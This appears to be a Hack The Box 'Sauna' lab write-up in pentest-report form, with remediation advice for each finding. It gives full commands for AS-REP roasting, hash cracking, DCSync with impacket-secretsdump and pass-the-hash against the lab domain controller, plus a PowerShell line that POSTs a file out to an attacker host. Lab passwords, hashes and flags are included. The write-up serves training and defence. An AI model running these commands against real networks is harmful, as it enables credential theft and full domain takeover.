HTB Sauna

Summary

HTB Sauna is an easy rated box focused on AS-REP roasting. This is accomplished here by scraping username candidates off of a public facing web server, and then using applicable tools to discover that one of the users lacks Kerberos Preauthentication which enables for kerberoasting to be used in order to gain initial access to the machine.

Following initial access, cached autologon credentials can be found for an internal service account that has DCSync permissions that can be used to compromise the DC admin credentials.

Service Enumeration

port protcol version notes
389/tcp LDAP MS Windows Active Directory LDAP Hostname: EGOTISTICAL-BANK.LOCAL
593/tcp RPC over HTTP Microsoft Windows RPC over HTTP 1.0 ???
445/tcp SMB ???
88/tcp Kerberos MS Windows Kerberos
53/tcp DNS Simple DNS Plus
80/tcp HTTP Microsoft IIS httpd 10.0

Combination of LDAP, Kerberos and DNS likely indicates that this is an Active Directory Domain Controller.

Nmap Scan results

Nmap scan report for 10.129.90.139
Host is up, received user-set (0.051s latency).
Scanned at 2023-10-04 21:39:21 UTC for 85s
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON          VERSION
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Egotistical Bank :: Home
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2023-10-05 04:39:32Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required
|_clock-skew: 7h00m00s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 34111/tcp): CLEAN (Timeout)
|   Check 2 (port 40095/tcp): CLEAN (Timeout)
|   Check 3 (port 62362/udp): CLEAN (Timeout)
|   Check 4 (port 23798/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2023-10-05T04:39:36
|_  start_date: N/A

Initial scans revealed a set of exposed services that typically indicate an Active Directory Domain controller, in addition to a basic webserver.

This web server was manually explored briefly, with a list of employees being found on /about.htm. This list was scraped and then used with username-anachy in order to create a likely usernames list based on common username formats. These were saved locally as brutelist.txt.

After this egotistical-bank.local (discovered in nmap output) was added to the local /etc/hosts file in order to allow proper name resolution against the domain controller.

Once this was in place, crackmapexec was used to attempt an AS-REP roast against these prospective usernames like so:


crackmapexec ldap 10.129.90.139 -u brutelist.txt -p '' --asreproast output.txt

This revealed that the user fsmith had been configured without Kerberos pre-authentication, which resulted in a successful AS-REP roast and the retrieval of this user's hashes.


$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:4c60d0ccd3e522437f68d2e5d283de80$0f528b437cfd4f5e71fb2c0128752826fefe9249852a55b3be40fee33346f36e80a42168cc5d788f976b09a5a3153b5d26454c1597a6ef4c94c106dd836415e095fcea56f61ab8c4f3cd52d4a554d49eda62d5e6bc40d688f7d76ff1702af3cb45e0e5e06b5659cbd9b526b5c1393a1d17bfca4f083c608aedb5804c85ad83b8bf1844b8a9ece3e0c2b1b6a6f83191e77806e9a5ea266cbd9cfc67605a9e8a59bb87eafcb2a6a48772e520617155daf26615351582b7e4ff3a1a2408935ddf660797541b654ce9497b436b5c380cfa75554b5aa7aeec58ff808d248eae498f9cd5300f534d5a8bd073be3e739204e2971c442a01bc15b5fc46fc41c76db0bc65

This hash was then saved to fsmith_hash.txt and was cracked using hashcat with the rockyou wordlist:


hashcat -m 18200 fsmith_hash.txt /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt

This resulted in the retrieval of fsmith's password, which was Thestrokes23.

These credentials were then used to logon to the remote host using Evil-WinRM.

Vulnerability Explanation

With Kerberos pre-authentication disabled, the fsmith account is vulnerable to a type of attack referred to as AS-REP roasting, which enables an attacker to retrieve an account's hashes, which can then be subsequently cracked offline, resulting in a compromise of the user's credentials.

Vulnerability Fix

As this vulnerability arises from configuration issues, there may be multiple ways to remediate it depending on your organization's specific needs:

  • Consider enabling pre-authentication on all accounts.
  • Additionally, consider implementing a stronger password policy; passwords should be longer than 12 characters, consist of a combination containing upper and lower case letters, numbers as well as symbols. Password candidates should also be checked against known leaks on a service like Have I Been Pwned in order to verify that the password is not in a public wordlist.
  • If pre-authentication cannot be disabled in the environment, consider implementing a stricter separation of duties between accounts in order to mitigate the level of access granted to vulnerable accounts. For instance, perhaps consider creating a seperate account for fsmith's service access that requires no pre-auth and his need for WinRM access, etc.

Severity

Assessed CVSS 3.1: 8.6 HIGH

AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Access was gained due to configuration errors; no exploit nor specialized payload was utilized.

Proof Screenshot

Proof Text

a0345376673f4596db53fa73867dc531

Privilege Escalation

Upon ganing access, WinPEAS was uploaded to the remote host in order to gather information about possible privilege escalation vectors.

Additionally, users were also enumerated, resulting in the discovery of a service account, svc_loanmgr that possessed Remote Management rights. This account became a point of interest on account of this.

Once WinPEAS had generated output, this was exfiltrated to the local machine using invoke-webrequest -Uri http://10.10.14.116 -Method POST -infile ./log.txt. Once this had been exfiltrated, the output was examined, resulting in the discovery of svc_loanmgr's credentials: Moneymakestheworldgoround!

These were appearently cached autologon credentials.

Bloodhound-python was then used to ingest domain information using this account's credentials in order to enumerate the Domain:


bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' --zip -d EGOTISTICAL-BANK.LOCAL -ns 10.129.90.139 -c all

This generated a zip that was then imported into Bloodhound locally. Upon examination of the bloodhound data, it was discovered that svc_loanmgr possessed DCSync rights over the domain:

Once this was discovered, Impacket was used to attempted to sync with the domain controller and retrieve high value hashes:


impacket-secretsdump -just-dc svc_loanmgr:Moneymakestheworldgoround\!@10.129.90.139 -outputfile dcsync_hashes

This revealed the DC Admin's hash:


Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::

Once this was acheived, a pass the hash attack was utilized with the administrator's credentials in order to retrieve the proof file from the administrator's desktop:


crackmapexec smb 10.129.90.139 -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e -d egotistical-bank.local -x "type C:\Users\Administrator\Desktop\root.txt"

This resulted in a successful exfiltration of the proof file and a confirmation of vulnerability to pass the hash attacks.

Vulnerability Explanation

Autologon is a convenience feature in Windows that stores account credentials in the registry in plain text. As such, any account configured to use it can readily have it's credentials stolen.

Vulnerability Fix

Please consider finding an alternative means for implementing autologon functionality. If this is not a necessary feature, please consider disabling it entirely.

Severity

Assessed CVSS 3.1: 8.3 HIGH

AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:L/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Vulnerability Explanation

Any account with DCSync rights is able to retrieve hashes for all accounts on the domain. This is usually for replication purposes between Domain Controller machine accounts.

Vulnerability Fix

Please assess the necessity of DCSync rights on the svc_loanmgr account. If these are not needed, please consider revoking this right.

Severity

Assessed CVSS 3.1: 8.0 HIGH

AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Vulnerability Explanation

NTLM hases can be passed directly in an AD environment to allow for logon. This permits an attacker to gain access without expending resources on offline password cracking.

Vulnerability Fix

  • Consider diabling NTLM logons in the environment and rely on Kerberos instead.
  • Consider deploying an MFA solution, especially for high value accounts such as the domain admin account.

Severity

Assessed CVSS 3.1: 8.6 HIGH

AV:A/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:H/RL:O/RC:C

Proof Of Concept Code

Issue is caused by a configuration error; no exploits or custom payloads used.

Proof Screenshot

Proof Text

4de55bc665d053c8001a15830ab789f9